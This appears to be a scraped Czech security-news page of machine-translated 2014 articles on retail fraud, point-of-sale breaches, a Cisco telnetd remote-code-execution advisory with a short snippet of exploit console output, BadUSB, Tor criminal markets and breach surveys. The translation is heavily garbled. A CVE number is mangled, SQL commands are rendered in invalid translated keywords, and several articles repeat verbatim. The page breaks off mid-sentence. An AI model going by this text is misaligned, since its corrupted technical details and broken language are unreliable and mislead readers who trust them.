Dne 13. listopadu americký maloobchodník Walmart oznámil, že se oficiálně začne odpovídající cenu za položky, které jsou rovněž prodávány za nižší cenu, v on-line prodejců. Méně než týden později, cena odpovídající politika byla pozměněna vyloučit tržiště dodavatele, třetí strany prodejců, aukční weby nebo stránky, které vyžadují členství. Co se vlastně stalo? No, pár dní po oznámení, webové stránky Sears, další velký US prodejce, byl zasažen závada, která z Wii U a 3DS svazky uvedené na prodej za cenu třikrát až čtyřikrát nižší, než je obvyklé. Některé bystrý jedinci zneužit to pro získání stejnou cenu pro položky v několika obchodních řetězců, cihla-a-malty (včetně Walmart), a chlubil o tom on-line. Vzhledem k tomu, závada byla opravena poměrně rychle, někteří podvodníci našel nový způsob, jak vytáhnout stejný trik:. založili falešné on-line záznamy s nízkými cenami za zařízení na Amazonu, vzal screenshot, potom odstraněn výpisy Armed se vytiskl výpis, se vydali k pokusu o ukládání zaměstnanců a vedoucích pracovníků podvod Walmart. Někteří to podařilo, jiní ne, ale pokusy o podvod se rychle uvedla společnost, která reaguje s výše uvedenou změnou cen odpovídající politiky. "V budoucnu, pokud chcete získat cenu utkání na Walmart, bude to mít být na prodaných položek Amazon, a ne jen položky prodávané na Amazonu, "konzumní Laura Northrup vysvětlil .


Michaels a Staples porušení provádí stejným útočníky?
1.12.2014 Hacking
Útočníci, že kradli informace k platební kartě od spotřebitelů Texas založené na umění a řemesla obchodního řetězce Michaels a mezinárodních kancelářské potřeby obchodní řetězec Staples je pravděpodobné, že ti samí. Podle informací, které Brian Krebs , malware nalezený v Staples obchodech a nalezený V Michaels komunikoval s tytéž sítě C & C. A i když je možné, že tyto sítě byla pronajata, je to také velmi nepravděpodobné, jak vytvářet od nuly, je jednodušší a levnější. Michaels porušení - vlastně dvě porušení: jedna ve svých prodejnách Aaron Brothers a druhý na Michaels obchodech - se konal mezi 8.5.2013 a 27.února 2014, a předpokládá se, že útočníci se podařilo ovlivnit kolem 3 milionů platebních karet přes oslabeným pokladních systémů. Pověsti o porušení Staples byly v oběhu od konce října a podle informací sdílených bankami, zdá se, že registrační pokladny v řadě Staples obchody byly ohroženy mezi červencem a zářím 2014. Podle zdrojů blízkých vyšetřování, asi 100 Staples obchody byly zasaženy. Staples mluvčí Mark Cautela potvrzeno že jsou vyšetřování, ve spojení s policií, "bezpečnostní údaje incident", která ovlivnila některé ze svých obchodech. "Věříme, že jsme vymýtit malware používané v vniknutí a podnikly kroky k dalšímu posílení bezpečnosti naší sítě," řekl.


telnetd rulez: Cisco IronPort WSA telnetd umožňující vzdálené spuštění kódu

10.11.2014 Hacking
Obdrželi jsme následující poradní zranitelnosti pro vzdálené spuštění kódu vuln identifikovány a hlášeny v Cisco IronPort WSA telnetd.

Prodejce: Cisco Product webové stránky: http://www.cisco.com chybu verze: Cisco IronPort WSA - AsyncOS 8.0.5 pro Web vybudovat 075 Datum: 22/05/2014 Kredity: Glafkos Charalambous CVE: CVE-2.011-4.862 CVSS Skóre: 7.6 Dopad: neověřenému vzdálenému spuštění kódu se zvýšenými oprávněními Popis: Cisco IronPort WSA virtuální zařízení jsou citlivé na staré FreeBSD telnetd šifrovací klíč ID přetečení vyrovnávací paměti, která umožňuje vzdálenému útočníkovi spustit libovolný kód (CVE-2011 - 4862). Cisco WSA Virtuální přístroje jsou zranitelné ve výchozím nastavení povolena telnetd démona.
 

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862
http://www.freebsd.org/security/advisories/FreeBSD-SA-11:08.telnetd.asc
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport

Pěkná práce Glafkos ale to, co není vidět, je mi třásl hlavou. * Povzdech *
budu opakovat prohlášení Facepalm-inspirující znovu: "Cisco WSA Virtuální přístroje jsou zranitelné ve výchozím nastavení povolena telnetd démona."
Přesto se telnet? A ve výchozím nastavení?
Od související FreeBSD poradenství: "The FreeBSD telnet daemon, telnetd (8), se provádí na straně serveru z . protokol virtuálního terminálu TELNET To bylo ve výchozím nastavení zakázána ve FreeBSD od srpna 2001 , a vzhledem k nedostatku kryptografického zabezpečení v protokolu TELNET, je důrazně doporučeno, aby protokol SSH být používán místo toho. "
 

Uvidíme, jestli to shrnuje pro vás, s laskavým svolením Glafkos: Snažím 192.168.0.160 ... . Připojení k 192.168.0.160 Znak escape je '^]'.

[+] Využití 192.168.0.160, telnetd rulez!
[+] Cílová OS - FreeBSD 8.2 amd64
[*] Užijte si shell


Shellshock přes SMTP

10.11.2014 Hacking
Dostal jsem několik zpráv o tom, co se zdá být Shellshock zneužít pokusy pomocí protokolu SMTP. Zdroje doposud všichni webhosting poskytovatelů, takže jsem za předpokladu, že se jedná o napadené systémy. Tyto e-maily záhlaví vypadat nějak takto (díky Justin pro anonymních záhlaví, žádné díky aplikaci Outlook pro vstřícně snaží, aby odkazy žít):

Užitečné zatížení je IRC bot perl s jednoduchými příkazy DDoS a možnost stáhnout a spustit další kód.


Hacking s Oldies!
10.11.2014 Hacking

V poslední době se zdá, že se téma nových chyb ve starém kódu - první (a velmi veřejně) OpenSSL a bash. Minulý týden jsme měli spoustu dalších, méně veřejných, ale stále elegantní chyby.

Za prvé, šikovný chyba v řetězci - CVE-2014-8485, s více detaily zde http://lcamtuf.blogspot.ca/2014/10/psa-dont-run-strings-on-untrusted-files.html
problém v wget ftp:
Nyní ftp klient (který byl nejprve zjištěn v BSD) - http://cxsecurity.com/issue/WLB-2014100174

To vše mají některé nesporné, pokud jsou údaje, že kód oprávněně měla být zpracování mohou být vytvořeny tak, aby spustit libovolný příkaz na cílovém systému. Druhá běžná věc po nich jako tyto nástroje jsou součástí našeho standardu, důvěryhodné toolkit - my všichni používáme každý den to.

Kdo ví? Kodéry, kteří psali věci v C zpět v den, ne vždy napsat kód, který věděl, jak moc byla příliš dobrá věc. Teď, když jsme všichni při pohledu na problémy s kontrolou hranice na vstupních dat, očekávají, že alespoň pár více z nich!


Hackerské nástroje pro zneužití USB už reálně fungují

9.11.2014 Hacking
Nástroje, jež se mohou využít k vykonání nebezpečných útoků prostřednictvím USB, už jsou na světě. A nelze se proti takovým atakům prakticky nijak bránit.

Dva bezpečnostní experti ve snaze poukázat na nebezpečí USB disků vydali nástroje pro USB ataky.

Vydání nástrojů Adamem Caudillem a Brandonem Wilsonem přichází jen dva měsíce poté, co německá společnost Security Research Labs (SRLabs) demonstrovala na konferenci Black Hat v Las Vegas útok zvaný BadUSB.

V rámci něj bezpečnostní experti ukázali, jak USB disk připojený k počítači může automaticky odesílat údery uživatele na klávesnici útočníkům, stahovat a instalovat škodlivé kódy, či dokonce změnit svůj profil na síťový adaptér a nabourat se tak do nastavení DNS.

Jak tehdy uvedli zaměstnanci SRLabs, útok vyžaduje úpravu firmwaru USB, již lze jednoduše provést přímo z operačního systému. Experti však nevydali žádné nástroje ani nezveřejnili detailní postup, jelikož tuto díru údajně není snadné opravit.

To vedlo Caudilla a Wilsona k tomu, aby se ve snaze porozumět BadUSB a bezpečnostním rizikům, která představuje pro uživatele, o útok pokusili také. Svá zjištění prezentovali v pátek na konferenci Derbycon v americkém Louisville a narozdíl od SRLabs dokonce i vydali potřebné nástroje spolu s dokumentací.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Během demonstrace na Derbyconu, jež je dostupná na Youtube, oba muži ukázali například to, jak na USB disku vytvořit skrytý oddíl, na nějž jsou antivirové programy krátké či jak zjistit hesla ke chráněným oddílům na USB discích, jež tuto funkci nabízejí.

Zveřejněné nástroje fungují u USB disků s ovladačem zvaným Phison 2251-03, lze je však snadno přizpůsobit i pro jiné ovladače od tchajwanské společnosti Phison Electronics. Ty jsou na velké většině USB disků, které jsou v současné době na trhu.

„Opravdu doufáme, že vydáním (těchto nástrojů) přimějeme výrobce, aby trvali na podepsaných firmwarových aktualizacích, a že Phison přidá podporu pro podepsané aktualizace na všechny ovladače, které prodává,“ uvedl Caudill.

„Phison není jediným hráčem na trhu, ale je největší a já bych rád viděl, jak se ujme vedoucí role a bude inspirovat ve zlepšení bezpečnosti USB disků i další firmy.“

Špatnou zprávou je, že proti útoku se nedá nijak bránit. Jednou cestou je, aby výrobci vyžadovali pro USB ovladače podepsané firmwarové aktualizace či zcela zablokovali možnost měnit firmware, jakmile zařízení opustí továrnu. I kdyby to však někteří výrobci udělali, je otázkou, jaký by to mělo efekt, jelikož na trhu i mezi lidmi jsou desítky či stovky milionů USB disků, které mohou být potenciálně nebezpečné.


Je Snapchat nebezpečný?

9.11.2014 Hacking
V posledních týdnech se objevily zprávy o průnicích do systémů americké banky JP Morgan Chase, úniku fotek celebrit z Apple iCloud, krádeži více než 70 tisíc obrázků ze Snapchatu a nyní se mluví o údajném hacku Dropboxu. Otázkou tak je, zda zmíněné firmy dělají pro zabezpečení dost.

Ve většině ze zmíněných kauz nedošlo k průniku na servery dané společnosti, avšak útočníci využili techniku automatizovaného hádání hesel, zneužili aplikace třetích stran neautorizované k používání dané služby, či přihlašovací jména a hesla používaná uživateli k přihlašování na jiné webové stránky.

Tento týden na portálu Pastebin neznámý hacker oznámil, že vlastní téměř sedm milionů přihlašovacích údajů k Dropboxu. Následně bylo několik stovek z nich zveřejněno. Bezpečnostní inženýr Dropboxu Anton Nityagin však trvá na ton, že k průniku na servery této oblíbené cloudové služby nedošlo.

„Uživatelská jména a hesla ve zmíněném článku pochází k jiných služeb. Útočníci se pomocí kradených údajů pokusili přihlásit na různé stránky na internetu, včetně Dropboxu,“ uvedl Mityagin. Podobně reagovala nedávno i banka Chase s tím, že v žádném případě není nutné měnit PINy či hesla, nebo dokonce vyměňovat platební karty.

Apple trvá na tom, že jeho iCloud je bezpečný a Snapchat taktéž jakákoli pochybení na své straně odmítá. Podle expertů však společnosti nedělají k ochraně svých sítí a identifikaci nekalých aktivit dostatek.

„Poskytovatelé služeb mohou automatizované hádání hesel zablokovat. Pokud vidíte, že se někdo z jedné IP adresy pokusil stokrát připojit, měli byste to prověřit,“ uvedl profesor z College of Computer and Information Science na Northeastern University a spoluzakladatel poskytovatele bezpečnostních řešení Lastline Engin Kirda.

To, že firmy dělají pro ochranu uživatelů málo, lze demonstrovat na nedávno vydané zprávě americké FTC. Podle ní například Snapchat ukládal videa svých uživatelů na zařízení příjemce nešifrovaná mimo tzv. sandbox. To znamená, že k videím mohly přistupovat i jiné aplikace. I když podmínky užívání Snapchatu zakazují, aby aplikace třetích stran sdílely zprávy a fotografie pomocí jeho API, taková aplikace s názvem SnapSaved je dostupná již několik let.

Tato aplikace pak byla odpovědná za to, že asi 70 000 fotografií a videí ze Snapchatu bylo zveřejněno na jedné webové stránce. A jak podotýká John Kindervag ze společnosti Forrester Research, uživatelé si často rizika spojená s používáním aplikací třetích stran neuvědomují.

Podle Kindervaga stojí za nedávnou vlnou průniků především vzrůst popularity sociálních médií a špatné zabezpečení. Uživatelé by si pak měli uvědomit, že jakmile nahrají data na cloud, riziko jejich krádeže se mnohonásobně zvýší - nezávisle na tom, co tvrdí poskytovatelé cloudu.

Lidé by měli používat více hesel, která (pokud si je nepomatují), mohou ukládat do služeb typu KeePassX, jež je šifrují. Důležité je také zvolit dostatečně složité heslo. Poskytovatelům služeb pak analytici doporučují využít technik, které sledují chování jednotlivých uživatelů a pokud se tato aktivita dramaticky změní, poskytovatel by měl ihned zakročit.


Hackerské nástroje pro zneužití USB už reálně fungují

6.10.2014 Hacking
Nástroje, jež se mohou využít k vykonání nebezpečných útoků prostřednictvím USB, už jsou na světě. A nelze se proti takovým atajkům prakticky nijak bránit.

Dva bezpečnostní experti ve snaze poukázat na nebezpečí USB disků vydali nástroje pro USB ataky.

Vydání nástrojů Adamem Caudillem a Brandonem Wilsonem přichází jen dva měsíce poté, co německá společnost Security Research Labs (SRLabs) demonstrovala na konferenci Black Hat v Las Vegas útok zvaný BadUSB.

V rámci něj bezpečnostní experti ukázali, jak USB disk připojený k počítači může automaticky odesílat údery uživatele na klávesnici útočníkům, stahovat a instalovat škodlivé kódy, či dokonce změnit svůj profil na síťový adaptér a nabourat se tak do nastavení DNS.

Jak tehdy uvedli zaměstnanci SRLabs, útok vyžaduje úpravu firmwaru USB, již lze jednoduše provést přímo z operačního systému. Experti však nevydali žádné nástroje ani nezveřejnili detailní postup, jelikož tuto díru údajně není snadné opravit.

To vedlo Caudilla a Wilsona k tomu, aby se ve snaze porozumět BadUSB a bezpečnostním rizikům, která představuje pro uživatele, o útok pokusili také. Svá zjištění prezentovali v pátek na konferenci Derbycon v americkém Louisville a narozdíl od SRLabs dokonce i vydali potřebné nástroje spolu s dokumentací.

Během demonstrace na Derbyconu, jež je dostupná na Youtube, oba muži ukázali například to, jak na USB disku vytvořit skrytý oddíl, na nějž jsou antivirové programy krátké či jak zjistit hesla ke chráněným oddílům na USB discích, jež tuto funkci nabízejí.

Zveřejněné nástroje fungují u USB disků s ovladačem zvaným Phison 2251-03, lze je však snadno přizpůsobit i pro jiné ovladače od tchajwanské společnosti Phison Electronics. Ty jsou na velké většině USB disků, které jsou v současné době na trhu.

„Opravdu doufáme, že vydáním (těchto nástrojů) přimějeme výrobce, aby trvali na podepsaných firmwarových aktualizacích, a že Phison přidá podporu pro podepsané aktualizace na všechny ovladače, které prodává,“ uvedl Caudill.

„Phison není jediným hráčem na trhu, ale je největší a já bych rád viděl, jak se ujme vedoucí role a bude inspirovat ve zlepšení bezpečnosti USB disků i další firmy.“

Špatnou zprávou je, že proti útoku se nedá nijak bránit. Jednou cestou je, aby výrobci vyžadovali pro USB ovladače podepsané firmwarové aktualizace či zcela zablokovali možnost měnit firmware, jakmile zařízení opustí továrnu. I kdyby to však někteří výrobci udělali, je otázkou, jaký by to mělo efekt, jelikož na trhu i mezi lidmi jsou desítky či stovky milionů USB disků, které mohou být potenciálně nebezpečné.


Nový nástroj: kippo-log2db.pl
21.6.2014 Hacking

Provozoval jsem kippo několik let na několika honeypots, že mám kolem sebe a když jsem začal jsem se jen přihlášení pro textové protokoly, které kippo můžete vytvořit. Od té doby, kippo nyní podporuje přihlašování přímo na databázi MySQL a některé další lidi (zejména Ioannis "Ion" Koniaris na bruteforce.gr) vytvořili nějaké pěkné nástroje pro generování sestav z kippo dat. Tyto nástroje očekávat, že údaje, které se v kippo MySQL databázového schématu. Po přihlášení několik let v hodnotě věci k souborům textu protokolu, nechtěl jsem přijít o všechna data, ale chtěl jsem, aby bylo možné využít některé z úhledných nástrojů, které Ion vyvinula, takže jsem potřeboval způsob, dostat, že data z textových protokolů pro podporované db schématu. Nyní Ion vytvořil skript, který on volal Kippo2MySQL, ale to převést věci do svého schématu a ztratil některé údaje v tomto procesu. Použití, že jako inspirace, nicméně jsem vytvořil skript, který bude číst textové protokoly kippo a naplnit kippo databáze (pomocí stejné schéma, které kippo nyní mohou přihlásit přímo). Jediný zádrhel, který jsem zjistil, je, že když kippo je přihlášení do textových protokolů a restartuje se neudržuje jedinečné ID relace, začne znovu od 1. To způsobilo, že jsem musel udělat malou změnu v tabulce relací. Musel jsem změnit primární klíč z ID na (ID, StartTime). Naštěstí jsem měl kolizi, kde více relací se stejným id vlastně měli ttylogs, který je místo, kde se věci mohly být trochu povrchní. Toto bylo provedeno s

zasedání mysql> ALTER TABLE pokles primární klíč, přidat primární klíč (id, StartTime);
poddajný

mysql> zobrazit vytvořit relace tabulky \ G
*************************** 1 řádek ********************. *******
Tabulka: zasedání
Vytvořit tabulku: CREATE TABLE `zasedání` (
`Id` char (32) NOT NULL,
`Starttime` datetime NOT NULL,
`EndTime` datetime DEFAULT NULL,
`Snímač` int (4) NOT NULL,
`Ip` varchar (15) NOT NULL DEFAULT'',
`Termsize` varchar (7) DEFAULT NULL,
`Klient` int (4) DEFAULT NULL,
PRIMARY KEY (`id`, `starttime`),
KEY `starttime` (`starttime`, `snímač`)
) ENGINE = InnoDB DEFAULT charset = latin1
1 řádek v souboru (0,01 sec)
Já jsem dovezl okolo 800K pokusy o přihlášení a nyní můžete hrát s kippo-grafu nebo (brzy, jsem neměl šanci ještě) kippo2elasticsearch. Skript lze nalézt zde ale mám jeden malý problém, že se budu snažit opravit brzy, myslím, že se tiskne příliš mnoho # 's, jsem ji vytisknout z 1 každých 10.000 řádků čte ze souborů protokolu a Vypadá to, že jsem stále mnohem více než to, ale to je menší nepříjemnost, možná budu jen přidat přepínač do vypni to později. Do té doby si můžete vychutnat a pokud zjistíte nějaké problémy, nebo máte nápady na zlepšení, dejte mi vědět, a to buď v komentářích nebo prostřednictvím e-mailu na níže mou adresu.

Odkazy:

http://handlers.sans.org/jclausing/kippo-log2db.pl


Tor skryté služby - bezpečné útočiště pro zločinci
5.3.2014 Hacking

Během několika posledních měsíců jsem se pečlivě sleduje tzv. darknet zdrojů, většinou sítě Tor. A ještě jedna věc, která je na první pohled zřejmé, je, že cybercriminal prvek roste. I když, infrastruktura Tor a cybercriminal zdroje nejsou na stejné úrovni jako konvenční internetu, se nám podařilo najít přibližně 900 skryté služby on-line v současné době. Tam jsou také zhruba 5500 uzly celkem a 1000 výstupních uzlů, ale možnost vytvoření anonymní a zneužívání bez podzemní fórum, na trhu nebo malware C & C serveru je přilákat více a více zločinců k síti Tor.

Malware

Počítačoví zločinci se začal aktivně používat Tor hostit škodlivý infrastruktury. Zjistili jsme, Zeus se schopností Tor , pak detekován Chewbacca a nakonec jsme analyzovali první Tor Trojan pro Android . Rychlý pohled na síťových zdrojů Tor odhaluje velké množství prostředků určených na malware - C & C servery, admin panely, atd.

Hosting C & C servery Tor dělá je těžší určit, blacklist nebo odstranění.


Cythosia botnet webpanel

Ačkoli vytvoření komunikační modul Tor v malware vzorku znamená práci navíc z malware vývojáři, bude nárůst nových malware Tor-založené, stejně jako podporu Tor pro existující malware.


. Net SocksBot napevno C & C v Tor síti

Cybercriminal fóra a tržiště jsou široce známý na internetu. Některé z nich jsou veřejné, některé jsou soukromé a potřebujete souhlas nebo pozvání od stávajícího člena nebo musí být respektována osobnost v undergroundové scéně. Nyní další vrstva byla přidána - Tor podzemní tržiště. Všechno to začalo z nechvalně známé Silk Road trhu a vyvinuli desítky specializovaných trhů: drogy, zbraně a, samozřejmě, malware.


Botnet na prodej

Registrace jednoduchý postup, obchodník hodnocení, garantovaná služba a uživatelsky přívětivé rozhraní - to jsou standardní rysy Tor underground trhu. Některé obchody vyžadují prodejci složit slib - fixní částku peněz - před zahájením obchodování. To má zajistit, že obchodník je skutečný a jeho služby nejsou podvod nebo nekvalitní.


SpyEye na prodej

Finanční podvody

Carding obchody jsou pevně usadil v darknet. Odcizené osobní info je na prodej s širokou paletou vyhledávání atributů, jako je země, může banka atd. Tor kreditní karty on-line obchodů, které byly kritizovány zločinci za špatnou kvalitu, nebo za to, že falešný najít druhou šanci na život v darknet.


Online prodejna údaje ukradené kreditní karty

Nabídky nejsou omezeny na kreditní karty - skládky, sběračky a mykacího zařízení jsou také na prodej.


Obchody s ostatními mykacích zboží

Praní špinavých peněz

Bitcoins hrají důležitou roli v podzemních finančních operací. Téměř vše, co v síti Tor je kupoval a prodával pomocí bitcoins. I když iJát je téměř nemožné, aby se spojení mezi Bitcoin peněženku a skutečnou osobou, je možné, aby: sledovat bitcoin transakce, protože všechny z nich jsou průhledné a veřejné, vybudovat obchodní plán, co se děje, a zjistit nejcennější transakce provedené prostřednictvím služeb směny Bitcoin. To je důvod, proč služby praní špinavých peněz existují na Tor. Počítačoví zločinci mohou vytvořit účet, depozitní bitcoins a budou rozděleny do různých veličin, přenesena přes desítky různých peněženek, aby jakékoliv vyšetřování velmi složité.


Praní špinavých peněz služba

Závěry

Rostoucí počet Tor skrytých služeb a snadnost, s níž se může být nasazen přitahuje stále více a více zločinci v darknet.
Malware vývojáři používat Tor více a více pro různé úkoly malware souvisejících
Finanční podvody a praní špinavých peněz jsou důležitými aspekty sítě Tor.


Cílová hack pobídl americké firmy utrácet více na kybernetické bezpečnosti
3.3.2014 Hacking
Nový výzkum prováděný tento měsíc ukazuje, že útoky na mezinárodních podniků, včetně bank a maloobchodních gigantů, jako jsou Target, vedla k významnému 60% amerických dotázaných podniků zvýšit jejich kybernetické bezpečnosti rozpočet. Z těch podniků, které plánují zvýšit svou kybernetickou bezpečnost rozpočtu v průběhu následujících 12 měsíců, hlasité 78% uvedlo nedávné útoky, že mají významný vliv na jejich rozhodnutí.

Mezinárodní výzkum také zjistil, že 53% amerických firem dotazovaných se považují hrozbu kybernetických útoků jako jeden ze svých tří největších podnikatelských rizik, zrcadlení nedávné varování od Světového ekonomického fóra, které kybernetické útoky jsou jedním z 5 největších hrozeb, kterým čelí svět 2014. Výzkumné detaily obchodní zájmy a mínění po celém cyber a naznačuje silnou poptávku z velkých globálních společností pro větší inteligenci o povaze nových kybernetických hrozeb a lepší porozumění obchodní zranitelnosti. Nové poznatky přicházejí jako BAE Systems Applied Intelligence zprávy "podnikání a Cyber ​​Threat: vzestup digitální kriminality ", která zjistila, že většina amerických respondentů (82%) očekává, že počet cílených kybernetických útoků zvýšit v průběhu příštích dvou let. To bylo okamžitě nápadné, že organizované skupiny podvodníků byly identifikovány nejvyšší počet respondentů v obou USA (52%) a v rámci skupiny průzkumu jako celku (55%), jako skupina považuje za nejpravděpodobnější montáž útoky. To by mohlo ukazovat na obavy kolem možného poškození počítačových povolen útoků podvodu přesně přírody prožívají Target a další. Výzkum také ukázal, že firmy se domnívají, že jejich zvýšení expozice internetovým hrozbám, způsobené novými způsoby práce, představuje riziko, protože přizpůsobit obchodní praktiky držet krok s hyper-propojeném světě. Například, 72% severoamerických respondentů si myslí, počítačové riziko spojené s mobilními technologiemi bylo významné riziko, ale pouze 61% byli jisti, že pochopili risks.3 Tváří v tvář těmto výzvám, je to alarmující si uvědomit, že značná část respondentů - asi třetina (31% v USA a 30% v celosvětovém měřítku) - stále ještě nevěří, že jejich představenstvo plně pochopili rizika, která Cyber. Chcete-li dále zkoumat, výzkum pak prozkoumal, jaké nástroje respondenti se domnívali, že pomůže jejich desky, aby se více opatření, aby se zabránilo kybernetických útoků. S jasnější pochopení zranitelnosti (prosazovaný 53% respondentů v USA a 50% celkové) a mají inteligenci, o připravovaných hrozeb (44% v USA a 47% celkově) ukázala nejpopulárnější odpovědi. Další poznatky amerických:

Cena: 29% respondentů odhaduje úspěšný kybernetický útok by stálo jejich organizace více než 75 milionů amerických dolarů, dalších 20% uvedlo, že více než US $ 15 milionů.
Příčina útoků: skupina identifikována jako nejpravděpodobnější montáž cílové útoky nejvyšším počtem amerických respondentů bylo organizované skupiny podvodníků (55% respondentů). Američané byli více znepokojeni, které jsou zapojeny do průmyslové špionáže, než jakýkoli jiný trh (47% ve srovnání s 40% v Kanadě, 37% ve Velké Británii a 35% v Austrálii).
Se týkají: Na otázku, co by byli nejvíce znepokojeni v případě úspěšného útoku, nejvíce obyčejná odezva v USA byl ztrátu dat zákazníků (61%). Druhé hodnocení se týkají mimo USA respondentů byla krádež duševního vlastnictví, - s Američany výrazně více zajímají o IP krádeže než jiné trhy (47% respondentů a ve srovnání s 38% v Kanadě, 35% ve Velké Británii, a 43% v Austrálii).
Důvěra: podstatná většina (88%) byli přesvědčeni, ve schopnosti jejich organizace, aby se zabránilo cílených kybernetických útoků. Menší, ale stále velká většina (77%), byli přesvědčeni, ve schopnosti svého sektoru, aby se zabránilo útokům.
Krizové plány: 28% amerických organizací dotazovaných ještě neměl, nebo nevěděli, krizových plánů v případě kybernetického útoku na jejich společnosti. Z těch respondentů, kteří se mají krizové plány, 56% si myslí, tito byli dobře zveřejněny. V Kanadě 70% dotázaných uvedlo, že krizové plány, ale jen 37% z těch, s plány uvedli, že byli dobře zveřejněny.
Konvergence: Z těch respondentů, kteří se setkávají cyber-umožnil podvod, 55% amerických respondentů a 50% kanadských respondentů očekává počítačové hrát stále významnější úlohu v oblasti finančního podvodu.
"Co tento výzkum jasně ukazuje, že americké firmy si stále více uvědomují kybernetickém ohrožení a mají řadu protiopatření v místě. Nicméně, digitální zločin jako celek - nebezpečná kombinace organizovaných skupin pachatelů trestné činnosti s využitím počítačové techniky provádět finanční trestné činnosti - je také velkým problémem, zejména proto, že nejnovější vlna high-profil útoky, "říká Martin Sutherland, výkonný ředitel , BAE Systems Applied Intelligence. "A jako počet cest otevřených zločinci v hyper-propojeném světě se zvyšuje, jsme svědky skutečné hlad ze strany podniků pro jasnější pochopení jejich vlastní zranitelnosti a až na minutu počítačové hrozby inteligence.


Tor skryté služby - bezpečné útočiště pro zločinci
5.3.2014 Hacking

Během několika posledních měsíců jsem se pečlivě sleduje tzv. darknet zdrojů, většinou sítě Tor. A ještě jedna věc, která je na první pohled zřejmé, je, že cybercriminal prvek roste. I když, infrastruktura Tor a cybercriminal zdroje nejsou na stejné úrovni jako konvenční internetu, se nám podařilo najít přibližně 900 skryté služby on-line v současné době. Tam jsou také zhruba 5500 uzly celkem a 1000 výstupních uzlů, ale možnost vytvoření anonymní a zneužívání bez podzemní fórum, na trhu nebo malware C & C serveru je přilákat více a více zločinců k síti Tor.

Malware

Počítačoví zločinci se začal aktivně používat Tor hostit škodlivý infrastruktury. Zjistili jsme, Zeus se schopností Tor , pak detekován Chewbacca a nakonec jsme analyzovali první Tor Trojan pro Android . Rychlý pohled na síťových zdrojů Tor odhaluje velké množství prostředků určených na malware - C & C servery, admin panely, atd.

Hosting C & C servery Tor dělá je těžší určit, blacklist nebo odstranění.


Cythosia botnet webpanel

Ačkoli vytvoření komunikační modul Tor v malware vzorku znamená práci navíc z malware vývojáři, bude nárůst nových malware Tor-založené, stejně jako podporu Tor pro existující malware.


. Net SocksBot napevno C & C v Tor síti

Cybercriminal fóra a tržiště jsou široce známý na internetu. Některé z nich jsou veřejné, některé jsou soukromé a potřebujete souhlas nebo pozvání od stávajícího člena nebo musí být respektována osobnost v undergroundové scéně. Nyní další vrstva byla přidána - Tor podzemní tržiště. Všechno to začalo z nechvalně známé Silk Road trhu a vyvinuli desítky specializovaných trhů: drogy, zbraně a, samozřejmě, malware.


Botnet na prodej

Registrace jednoduchý postup, obchodník hodnocení, garantovaná služba a uživatelsky přívětivé rozhraní - to jsou standardní rysy Tor underground trhu. Některé obchody vyžadují prodejci složit slib - fixní částku peněz - před zahájením obchodování. To má zajistit, že obchodník je skutečný a jeho služby nejsou podvod nebo nekvalitní.


SpyEye na prodej

Finanční podvody

Carding obchody jsou pevně usadil v darknet. Odcizené osobní info je na prodej s širokou paletou vyhledávání atributů, jako je země, může banka atd. Tor kreditní karty on-line obchodů, které byly kritizovány zločinci za špatnou kvalitu, nebo za to, že falešný najít druhou šanci na život v darknet.


Online prodejna údaje ukradené kreditní karty

Nabídky nejsou omezeny na kreditní karty - skládky, sběračky a mykacího zařízení jsou také na prodej.


Obchody s ostatními mykacích zboží

Praní špinavých peněz

Bitcoins hrají důležitou roli v podzemních finančních operací. Téměř vše, co v síti Tor je kupoval a prodával pomocí bitcoins. I když iJát je téměř nemožné, aby se spojení mezi Bitcoin peněženku a skutečnou osobou, je možné, aby: sledovat bitcoin transakce, protože všechny z nich jsou průhledné a veřejné, vybudovat obchodní plán, co se děje, a zjistit nejcennější transakce provedené prostřednictvím služeb směny Bitcoin. To je důvod, proč služby praní špinavých peněz existují na Tor. Počítačoví zločinci mohou vytvořit účet, depozitní bitcoins a budou rozděleny do různých veličin, přenesena přes desítky různých peněženek, aby jakékoliv vyšetřování velmi složité.


Praní špinavých peněz služba

Závěry

Rostoucí počet Tor skrytých služeb a snadnost, s níž se může být nasazen přitahuje stále více a více zločinci v darknet.
Malware vývojáři používat Tor více a více pro různé úkoly malware souvisejících
Finanční podvody a praní špinavých peněz jsou důležitými aspekty sítě Tor.


Cílová hack pobídl americké firmy utrácet více na kybernetické bezpečnosti
3.3.2014 Hacking
Nový výzkum prováděný tento měsíc ukazuje, že útoky na mezinárodních podniků, včetně bank a maloobchodních gigantů, jako jsou Target, vedla k významnému 60% amerických dotázaných podniků zvýšit jejich kybernetické bezpečnosti rozpočet. Z těch podniků, které plánují zvýšit svou kybernetickou bezpečnost rozpočtu v průběhu následujících 12 měsíců, hlasité 78% uvedlo nedávné útoky, že mají významný vliv na jejich rozhodnutí.

Mezinárodní výzkum také zjistil, že 53% amerických firem dotazovaných se považují hrozbu kybernetických útoků jako jeden ze svých tří největších podnikatelských rizik, zrcadlení nedávné varování od Světového ekonomického fóra, které kybernetické útoky jsou jedním z 5 největších hrozeb, kterým čelí svět 2014. Výzkumné detaily obchodní zájmy a mínění po celém cyber a naznačuje silnou poptávku z velkých globálních společností pro větší inteligenci o povaze nových kybernetických hrozeb a lepší porozumění obchodní zranitelnosti. Nové poznatky přicházejí jako BAE Systems Applied Intelligence zprávy "podnikání a Cyber ​​Threat: vzestup digitální kriminality ", která zjistila, že většina amerických respondentů (82%) očekává, že počet cílených kybernetických útoků zvýšit v průběhu příštích dvou let. To bylo okamžitě nápadné, že organizované skupiny podvodníků byly identifikovány nejvyšší počet respondentů v obou USA (52%) a v rámci skupiny průzkumu jako celku (55%), jako skupina považuje za nejpravděpodobnější montáž útoky. To by mohlo ukazovat na obavy kolem možného poškození počítačových povolen útoků podvodu přesně přírody prožívají Target a další. Výzkum také ukázal, že firmy se domnívají, že jejich zvýšení expozice internetovým hrozbám, způsobené novými způsoby práce, představuje riziko, protože přizpůsobit obchodní praktiky držet krok s hyper-propojeném světě. Například, 72% severoamerických respondentů si myslí, počítačové riziko spojené s mobilními technologiemi bylo významné riziko, ale pouze 61% byli jisti, že pochopili risks.3 Tváří v tvář těmto výzvám, je to alarmující si uvědomit, že značná část respondentů - asi třetina (31% v USA a 30% v celosvětovém měřítku) - stále ještě nevěří, že jejich představenstvo plně pochopili rizika, která Cyber. Chcete-li dále zkoumat, výzkum pak prozkoumal, jaké nástroje respondenti se domnívali, že pomůže jejich desky, aby se více opatření, aby 